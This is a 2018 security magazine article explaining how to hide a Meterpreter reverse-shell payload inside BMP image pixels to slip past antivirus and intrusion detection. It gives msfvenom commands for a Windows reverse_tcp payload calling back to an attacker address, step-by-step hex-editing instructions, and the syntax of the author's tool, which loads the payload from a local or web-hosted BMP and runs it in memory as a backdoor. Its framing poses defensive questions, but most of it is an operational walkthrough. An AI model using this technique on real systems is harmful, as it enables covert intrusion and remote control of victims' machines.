Transferring Backdoor Payloads with BMP Image Pixels | By Damon Mohammadbagher

Transferring Backdoor Payloads with BMP Image Pixels

In this article, I want to talk about BMP files and how you can use a bitmap file for transferring data or a malware payload. The idea for transferring or exfiltration data by images was not new but I want to talk about this because this is really dangerous and I want to talk about important questions about this threat, for example, why doesn’t anyone care about this?

As usual, I want to talk about transferring backdoor payloads. In this case, we can TEST this threat for bypassing anti-viruses or IPS/IDS too.

Before everything, let me show you one simple BMP Picture.

As you can see in “Picture 1”, we have a black background with red lines. Now tell me, do you see something wrong in this picture or something unreasonable?

Picture 1

Now I want to show you where unreasonable points are in this picture but you probably did not see this!

Picture 2: Malware Payload Injection behind Image Pixels

Now you can see I talked about where and now I want to talk about why this is dangerous also how can you do it?

  1. Important Questions!
  • Why is Transferring Payloads or Data by Images Dangerous?
  1. Because no one is thinking about this as an important threat, unfortunately.
  2. Did you scan BMP files for anti-viruses until now?
  3. Did you use AV for real-time detecting and real-time scanning BMP files?
  4. How many of these AVS can detect this threat ?
  5. How can you detect this threat when someone published BMP files in target website or infected website?
  6. Can you use this technique for web attacks or for bypassing WAF? Also, for reading payloads from BMP files for a web attack? (Web pentester guys better than me can talk about this.)
  7. For exfiltration in Web and Network, this is one of the best ways for transferring payloads and data over port 80 or 443, especially (Port 80) with or without payload encryption in BMP files (important).
  8. Firewall or IPS/IDS - what can you do for this one and how many of these tools can detect this technique?
  9. If I used this technique for my backdoors locally with encryption payload in pictures, who can detect this and how? Or, if I used this technique by chunking BMP files, it means split-up payloads to more than one picture file, then how can I detect this one?
  • How can you do this ?

First I want to talk about how you can do it manually without code by simple example then I will publish my C# code for this technique and I will explain how you can use my tool for this technique.

In this case, we want to inject payloads to the BMP image file by pixels (only BMP format).

So each pixel has color with RGB codes. In this technique, we should inject our payloads to RGB code for each pixel so we have something like these steps:

Code Behind Pixels
Pixel 1 = R(112) , G(255) , B(10)
Pixel 2 = R(192) , G(34) , B(84)
Pixel 3 = R(111) , G(0) , B(190)

Now we have these RGB payloads 112,255,10,192,34,84,111,0,190

Decimal == hex

112 == 70 
255 == ff
10 == 0A

192 == C0
34 == 22
84 == 54

111 == 6F
0 == 00
190 == BE

So our Pixels had these Meterpreter Payloads: 70FF0AC022546F00BE

As you can see, in picture 3, we have Hex and Decimal also Color for each Pixel.

Picture 3

Now you can understand how and where in BMP files should be changed for injection method.

Injecting Meterpreter Payload to a BMP file manually Step by step:

Now in this section, I want to talk about how you can do these things manually by steps:

Step 1: first, before everything, you need one BMP file in Windows so for this one you need to use MS Paint.

Note: you should do these steps in Windows only with MS Paint.

As you can see, in picture 4, we have a blank BMP file with 700 * 2 pixels.

Picture 4: BMP file with 700 * 2 Pixels

Now we have a blank BMP file with 700 * 2 pixels , now you can save this file with (24-bit bitmap) color format.

Step 2: In Kali Linux, you should make Meterpreter payload so with one of these commands you can have Meterpreter payload:

msfvenom -a x86_64 --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.56.1 -f c > payload.txt

msfvenom -a x86_64 --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.56.1 -f num > payload.txt

Step 3: now you should inject your payload in step 2 to the BMP file you made in step 1 with Kali Linux by hexeditor command or in Windows by “Hexeditor NEO” tool.

In “Picture 5” you can see hex editor NEO for this BMP file you made in Step 1 before changing Payload.

Picture 5

Now, in Picture 6, you can see we have three pixels with these payloads “70FF0A-C02254-6F00BE”

Picture 6

Now you can see what happens in BMP when you want to inject these payloads to images in this case BMP.

To do this, in this step, you should edit this BMP file (step 1) in Kali Linux by hexeditor command like picture 7.

In this time you should inject Meterpreter payloads to file with this tool Copy-Paste from “Offset 36” up to end.

Offset 36 is the first byte after BMP header (BMP Header is 54 bytes). In picture 5, you can see this section with Green Line.

  • Note: Before changing the BMP file, you should change your Meterpreter payload from this type “0xfc” to this “fc” so your payload should be something like “Pay.txt” file in Picture 9. (important)

Now you should copy the Payload string from “Pay.txt” and paste to the bitmap file from Offset 36 up to the end, like picture 7 and 8.

Picture 7

As you can see, your payload started with “FF48” in picture 7 also your payload finished with “FFD5” like picture 8.

Picture 8

Now you can save this file.

After these steps you will have something like Picture 9 and now you have one BMP file with injected Meterpreter payload.

Picture 9

As you can see, in picture 9, we have bitmap file with more pixels.

How many pixels do you need for Meterpreter Payload?

If we have 510 bytes Meterpreter Payload then we have 170 pixels for payloads.

510 Bytes payload , 3 is 1 byte for each : R + G + B ==> 1+1+1

510 / 3 = 170 Pixels

it means 0 …. 169 Pixels in MS Paint like picture 10.  

Picture 10

After making this BMP file, now you need a code for reading these payloads from BMP file.

I made one code by C# for reading Meterpreter payload from BMP file and executing in memory like a backdoor. Also, with my tool, you can make a new Bitmap file with Injection Meterpreter method and with this code you can modify other BMP files to injecting Meterpreter payload and finally my tool has a web feature for downloading BMP file by URL with HTTP traffic and executing payload in memory, like a backdoor. In the future, I will make an encryption feature for injecting Meterpreter payload to BMP files by this tool.

Executing Meterpreter Payload from BMP file with “NativePayload_Image.exe” step by step:

Step 1: if you want to see NativePayload_Image Syntax you should run this code without any switch like Picture 11:

Picture 11

With my code you can have very simple Meterpreter session with this syntax for local BMP files.

For (Backdoor Mode) with this tool like “Picture 11” you need this syntax:

Syntax: NativePayload_Image.exe bitmap “filename.bmp” [Meterpreter_payload_Length] [Header_Length]

Syntax: NativePayload_Image.exe bitmap “filename.bmp”  510 54


Note: Meterpreter Payload Length was 510 ( Made by msfvenom tool with “-f C” or “-f num” )

Note: BMP Header Length is 54 always

Picture 12

As you can see, in “Picture 12”, I had Meterpreter session by a local BMP file and this “NewBitmaImage.bmp” was my BMP file in Picture 9 and 10 so you can see we can make manually Bitmap file with “Injection Payload Method” like “Picture 9” also we can execute Meterpreter Payloads from this Bitmap file in memory by my C# code like “Picture 12”.

In this case, backdoor and BMP file should be in the same directory but you can use path for BMP file too.

Step 2: Making New Bitmap File with injection Meterpreter Payload by tool.

In this case, you need Meterpreter Payload by one of these command:

msfvenom -a x86_64 --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.56.1 -f c > payload.txt

msfvenom -a x86_64 --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.56.1 -f num > payload.txt

  • Note: in this step, you should change your output payload from Msfvenom like “picture13”.
  • Note: change” 0xfc , 0x48 , 0x83 “ to this “fc,48,83, ...”

Picture 13

Now, like picture 14, you can make a new Bitmap file with a new File_Name.

Picture 14

And correct syntax is:

Syntax : NativePayload_Image.exe create “Newfilename.bmp” [Meterpreter_payload]

Syntax : NativePayload_Image.exe create “Newfilename.bmp” fc,48,83,....

step 3: Modify BMP files for Injecting Meterpreter Payload to existing BMP files.

In this case, you need payload and one BMP file for adding or injecting payload to that, like picture 15.

Picture 15

Now you should use this syntax to modify this file .

Syntax: NativePayload_Image.exe modify “Existfilename.bmp” [header_length] [Meterpreter_payload]

Syntax: NativePayload_Image.exe modify “Existfilename.bmp”  54 fc,48,83,....


Note: BMP header length is 54 always.

Picture 16

As you can see, in picture 16, after modifying this file, we can see Meterpreter payload pixels in a black background after “300% Zooming”.

You can see in the next picture, this modified BMP file will work very well.

This time, I want to use this BMP file in website for downloading by HTTP traffic, so in this case, I want to use “MyBMP_to_Modify.bmp”, this file made in the previous step, and I will make one web-server in Kali Linux for downloading this Bitmap file by “Url” and HTTP Traffic.

Step 4: Downloading BMP file from website with “Url” and using HTTP Traffic.

So now we have this file “MyBMP_to_Modify.bmp” and I used this file in Kali Linux web-server via Python Web-server “python -m SimpleHTTPServer” finally I will have Meterpreter Session by “HTTP Traffic” like “Picture 17”.

In this case, downloading BMP file via URL our syntax is:

Syntax: NativePayload_Image.exe url “Url” [Meterpreter_payload_Length] [Header_Length]

Syntax : NativePayload_Image.exe url "https://url.com/MyBMP_to_Modify.bmp"  510   54  

Picture 17 

  • at a glance: This technique was not NEW but I think no one cares about this threat, but this is really dangerous. We should check our anti-viruses for this threat especially when someone uses encryption payload in BMP file then it’s really undetectable for most AVS or when someone uses this technique with chunking payloads to more than one BMP file then its really dangerous, too, and I think by default the most AVS do not scan BMP extensions files for real-time or file-system manually scans also I don't think they can detect these payloads in BMP files (should check AVS one by one) and if someone uses this technique for ex-filtration for transferring data without backdoor payload in BMP files then what can we do for defense and how can we detect this method? (Check it in your AVS right now.)

I will publish C# code in this link very soon:

https://github.com/DamonMohammadbagher/NativePayload_Image

Originally posted on LinkedIn: https://www.linkedin.com/pulse/transferring-backdoor-payloads-bmp-image-pixels-damon-mohammadbagher/

Here you can find the article "Transferring Backdoor Payloads By ICMPv4 Traffic" by Damon Mohammadbagherhttps://eforensicsmag.com/download/archaeology-live-response/

July 19, 2018
Subscribe
Notify of
guest

This site uses Akismet to reduce spam. Learn how your comment data is processed.

0 Comments
Inline Feedbacks
View all comments
© HAKIN9 MEDIA SP. Z O.O. SP. K. 2013